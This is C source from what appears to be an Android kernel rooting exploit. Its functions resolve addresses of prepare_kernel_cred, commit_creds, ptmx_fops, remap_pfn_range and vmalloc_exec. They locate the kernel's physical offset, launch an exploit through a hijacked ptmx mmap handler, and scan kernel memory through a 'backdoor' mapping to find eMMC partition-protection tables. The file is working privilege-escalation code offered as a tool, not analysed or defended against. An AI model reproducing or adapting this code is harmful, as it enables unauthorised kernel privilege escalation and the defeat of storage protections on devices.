static void register_address(void) { #ifdef HAS_SET_SYMBOL_ADDRESS printf("Essential address are:\n"); if (device_set_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred), (unsigned long int)prepare_kernel_cred)) { printf(" prepare_kernel_cred = %p\n", prepare_kernel_cred); } if (device_set_symbol_address(DEVICE_SYMBOL(commit_creds), (unsigned long int)commit_creds)) { printf(" commit_creds = %p\n", commit_creds); } if (device_set_symbol_address(DEVICE_SYMBOL(remap_pfn_range), (unsigned long int)remap_pfn_range)) { printf(" remap_pfn_range = %p\n", remap_pfn_range); } if (device_set_symbol_address(DEVICE_SYMBOL(vmalloc_exec), (unsigned long int)vmalloc_exec)) { printf(" vmalloc_exec = %p\n", vmalloc_exec); } if (device_set_symbol_address(DEVICE_SYMBOL(ptmx_fops), (unsigned long int)ptmx_fops)) { printf(" ptmx_fops = %p\n", ptmx_fops); } #endif /* HAS_SET_SYMBOL_ADDRESS */ }
static bool setup_param_from_database(void) { int i; if (mmc_protect_part) { if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) { return true; } } mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part)); if (!mmc_protect_part) { detect_mmc_protect(); mmc_protect_part = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect_part)); } mmc_protect_part_type = device_get_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type)); if (mmc_protect_part) { if (mmc_protect_part_type == MMC_PROTECT_PART_TYPE1 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE2 || mmc_protect_part_type == MMC_PROTECT_PART_TYPE3) { return true; } } mmc_protect_part = 0; mmc_protect_part_type = MMC_PROTECT_PART_TYPE_UNKNOWN; return false; }
static bool get_creds_functions_addresses(void **prepare_kernel_cred_address, void **commit_creds_address) { *prepare_kernel_cred_address = (void *)device_get_symbol_address(DEVICE_SYMBOL(prepare_kernel_cred)); *commit_creds_address = (void*)device_get_symbol_address(DEVICE_SYMBOL(commit_creds)); if (*prepare_kernel_cred_address && *commit_creds_address) { return true; } print_reason_device_not_supported(); return false; }
static void * get_delayed_rsp_id_addresses(void) { void *value; value = (void *)device_get_symbol_address(DEVICE_SYMBOL(delayed_rsp_id)); if (value) { return value; } print_reason_device_not_supported(); return NULL; }
bool setup_remap_pfn_range_address(void) { if (remap_pfn_range) { return true; } remap_pfn_range = (void *)device_get_symbol_address(DEVICE_SYMBOL(remap_pfn_range)); if (!remap_pfn_range && kallsyms_exist()) { remap_pfn_range = kallsyms_get_symbol_address("remap_pfn_range"); } return !!remap_pfn_range; }
bool setup_vmalloc_exec_address(void) { if (vmalloc_exec) { return true; } vmalloc_exec = (void *)device_get_symbol_address(DEVICE_SYMBOL(vmalloc_exec)); if (!vmalloc_exec && kallsyms_exist()) { vmalloc_exec = (void *)kallsyms_get_symbol_address("vmalloc_exec"); } return !!vmalloc_exec; }
static unsigned long int get_kernel_physical_offset(void) { unsigned long int offset; offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (!offset) { offset = find_kernel_text_from_iomem(); } if (offset) { return offset; } return default_kernel_physical_offset; }
static unsigned long int get_ptmx_fops_address(void) { unsigned long int address; address = device_get_symbol_address(DEVICE_SYMBOL(ptmx_fops)); if (address) { return address; } if (kallsyms_exist()) { address = kallsyms_get_symbol_address("ptmx_fops"); if (address) { return address; } } return 0; }
static bool setup_variables(void) { kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (kernel_physical_offset) { return true; } kernel_physical_offset = find_kernel_text_from_iomem(); if (kernel_physical_offset) { return true; } kernel_physical_offset = find_kernel_text_from_config(); if (kernel_physical_offset) { return true; } print_reason_device_not_supported(); return false; }
bool run_with_mmap(memory_callback_t callback) { unsigned long int kernel_physical_offset; bool result; if (run_exploit_mmap(callback, &result)) { return result; } setup_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); return false; } setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops addresses.\n"); return false; } kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (kernel_physical_offset) { set_kernel_phys_offset(kernel_physical_offset - 0x00008000); } else if (!detect_kernel_phys_parameters()) { printf("You need to manage to get kernel_physical_offset addresses.\n"); return false; } return attempt_exploit(ptmx_fops_mmap_address, (unsigned long int)&ptmx_mmap, 0, run_callback_with_mmap, callback); }
static bool detect_mmc_protect(void) { typedef struct { mmc_protect_part_type_t type; const struct mmc_protect_inf *inf; int num; } check_t; check_t check[] = { { MMC_PROTECT_PART_TYPE1, check_mmc_protect_part_type1, n_mmc_protect_part_type1 }, { MMC_PROTECT_PART_TYPE2, check_mmc_protect_part_type2, n_mmc_protect_part_type2 }, { MMC_PROTECT_PART_TYPE3, check_mmc_protect_part_type3, n_mmc_protect_part_type3 }, }; kallsyms *info; unsigned long int addr; const struct mmc_protect_inf *p; bool ret = false; int i; info = kallsyms_in_memory_init((void *)BACKDOOR_MMAP_ADDRESS, BACKDOOR_MMAP_SIZE); if (info == NULL) { printf("kallsyms_in_memory_init(): failed\n"); return false; } addr = kallsyms_in_memory_lookup_name(info, "mmc_protect_part"); if (!addr) { goto error_exit; } printf("Found: mmc_protect_part = 0x%08x\n", addr); p = backdoor_convert_to_mmaped_address((void *)addr); if (p[0].partition == 0) { p++; } for (i = 0; i < ARRAY_SIZE(check); i++) { int n; for (n = 0; n < check[i].num; n++) { if (p[n].partition != check[i].inf[n].partition) { break; } if (p[n].protect & ~(MMC_PROTECT_READ | MMC_PROTECT_WRITE)) { break; } } if (n == check[i].num) { printf("Detect partition type: %d\n", check[i].type); for (n = 0; n < check[i].num; n++) { printf("#%d: partiton %2d: protect %d\n", n, p[n].partition, p[n].protect); } device_set_symbol_address(DEVICE_SYMBOL(mmc_protect_part), addr); device_set_symbol_address(DEVICE_SYMBOL(mmc_protect.part_type), check[i].type); ret = true; break; } } error_exit: kallsyms_in_memory_free(info); return ret; }